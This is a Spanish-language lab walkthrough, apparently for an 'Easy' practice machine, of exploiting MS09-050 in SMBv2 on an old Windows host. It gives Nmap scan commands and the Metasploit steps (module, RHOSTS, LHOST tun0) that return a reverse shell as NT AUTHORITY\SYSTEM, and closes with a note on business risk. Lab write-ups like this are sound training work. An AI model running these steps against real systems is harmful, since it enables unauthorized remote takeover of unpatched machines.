skip to content
← volver al catálogo
EN
EXPEDIENTE №003 · CLASIFICACIÓN DECLASSIFIED ·

Internal

PG EASY OBJETIVO: 192.168.208.40
#windows#smb#ms09-050#metasploit#legacy-windows#rce

Internal Banner

Detalles

  • Sistema Operativo: Windows
  • Dificultad: Easy
  • IP Address: 192.168.208.40
  • Autor: AETH3RON

Resumen

Internal es una máquina Windows susceptible a una vulnerabilidad crítica legacy en el protocolo SMBv2. Enumerando los servicios expuestos, identificamos un fallo específico en cómo el servidor maneja la negociación SMB (MS09-050). Explotar esta vulnerabilidad permite la ejecución remota de código inmediata como NT AUTHORITY\SYSTEM, sin necesidad de credenciales previas ni escalada de privilegios posterior.

Enumeración

Nmap

Comenzamos realizando un escaneo SYN básico para identificar los puertos abiertos.

nmap -Pn -sS -sV -p- 192.168.208.40 -oN nmap-basic

escaneo nmap básico

A continuación, realizamos un escaneo dirigido sobre los puertos descubiertos para obtener información más detallada sobre los servicios y versiones del sistema operativo.

nmap -Pn -sS -sC -p53,135,139,445,3389,5357 192.168.208.40 -oN nmap-common

escaneo nmap completo

El output muestra puertos Windows legacy, lo que sugiere un sistema operativo antiguo. Para confirmar posibles fallos de seguridad, ejecutamos los scripts de vulnerabilidades de Nmap contra el puerto SMB (445).

nmap -p445 --script vuln 192.168.208.40 -oN nmap-vuln

escaneo de vulnerabilidades nmap

Acceso Inicial

El escaneo de vulnerabilidades indica que el objetivo es susceptible a MS09-050 (CVE-2009-3103).

Esta vulnerabilidad reside en el driver del protocolo SMBv2 (srv2.sys). Está causada por un error de índice fuera de los límites que ocurre cuando el servidor maneja un paquete SMB2_NEGOTIATE especialmente manipulado. Un atacante puede desencadenar este fallo para corromper la memoria y ejecutar código arbitrario con privilegios de kernel.

Para explotarla, usamos el módulo de Metasploit correspondiente: windows/smb/ms09_050_smb2_negotiate_func_index.

use windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.208.40
set LHOST tun0
run

exploit metasploit

El exploit funciona enviando el paquete de negociación malformado. Tras unos segundos, el servidor procesa la petición, activa la vulnerabilidad y nos devuelve una conexión inversa.

Verificamos el acceso spawneando una shell y comprobando el usuario actual.

shell
whoami

verificación de shell

Como se confirma, hemos obtenido exitosamente una shell como NT AUTHORITY\SYSTEM, dándonos control completo sobre la máquina. No se requiere escalada de privilegios adicional.

Impacto de Negocio

Esta máquina destaca el riesgo catastrófico de mantener sistemas Windows legacy sin parches de seguridad actuales. La vulnerabilidad MS09-050 en SMBv2 permite la ejecución remota de código como SYSTEM sin autenticación y sin interacción del usuario. En entornos empresariales donde los sistemas legacy persisten por requisitos de compatibilidad, un único host sin parchear puede servir como punto de entrada para despliegue de ransomware, movimiento lateral por la red o compromiso total del dominio. La ausencia de cualquier barrera de autenticación hace esta vulnerabilidad particularmente peligrosa en arquitecturas de red planas.

Referencias

// DESPACHOS DE CAMPO

Nuevos archivos recuperados, directos a tu bandeja. Sin ruido.